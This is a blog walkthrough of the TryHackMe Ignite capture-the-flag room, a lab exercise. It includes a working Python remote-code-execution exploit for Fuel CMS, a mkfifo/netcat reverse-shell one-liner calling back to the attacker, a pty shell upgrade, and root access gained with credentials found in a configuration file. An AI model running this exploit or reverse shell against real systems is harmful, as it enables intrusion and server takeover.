Writeup for the TryHackMe Ignite Room

The TryHackMe Ignite room is available at https://tryhackme.com/room/ignite

Reconnaissance

As always, the first thing to do is do an nmap scan of the server.

sudo nmap -sS -sV -vv -T4 x.x.x.x
  • -sS for Syn/Stealth Scan
  • -sV to find out version information
  • -T4 for a fast aggressive scan
  • -vv for very verbose to monitor the scan

And we get the following

  • PORT STATE SERVICE REASON VERSION
  • 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))

Now that we know it’s a webserver, lets browse to the machine and see what we can find.

We know it is a webapp, so lets do a scan with dirb and see if we can find any hidden files or folders that could be useful.

dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt

Which gives us some directories but not much else

Exploitation

However, using searchsploit, we do find that there some exploits available for Fuel CMS. For more information, have a look at the exploit-db page at https://www.exploit-db.com/exploits/47138

The local exploit file is available at /usr/share/exploitdb/exploits/linux/webapps. – Copy thee 47138.py file to your working folder.

The exploit needs some modification as the author was using burp as a proxy. Now you could use Burp as a proxy or you can just edit the code so it looks like the code below. Just remember to change the x.x.x.x to the correct IP of Ignite machine.

import requests
import urllib

URL = "http://x.x.x.x/"


def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start


while 1:
    xxxx = input('cmd:')
    url = URL+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    r = requests.get(url)

    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)

    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)

    print(r.text[0:dup])
python 47128.py

This will now give you a very limited shell. You can run any user commands you want, however, they will need to included in quotation marks like this

"whoami"

We can create a reverse listener to get a slightly more usable shell using netcat. Open another terminal on your machine and the following command

nc -nvlp 4444

This creates a netcat listener, waiting for a connection on port 4444.

Now, on Ignite box, run the command

"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 4444 >/tmp/f"

This will run a shell for netcat to connect your machine and the waiting netcat listener. For more information, visit the PentestMoney Reverse Cheat Sheet page at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Now you have a much better shell.

After running the whoami command, we see we are the user www-data. Check to see if you find any interesting files in the home directory for www-data.

Privilege Escalation

Now it is time to get root. First we can check if we can run any commands from sudo

sudo -l 

But we get an error message

However, the configuration page for the Fuel System says we can configure the database, maybe there are some useful details in it. Look through the /var/www/html sub folders for the configuration file.

And it does, it gives us the root login and password. Now we can just run the command

su root

And it is not so easy, we get an error message.

su: must be run from a terminal

However, if we run the following command, can get a working terminal assuming the system has python installed.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Now lets try use su again

su root

And after using the root password we found in the configuration file, we are now root. A quick visit to /root/ to find the second flag and the machine is complete.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s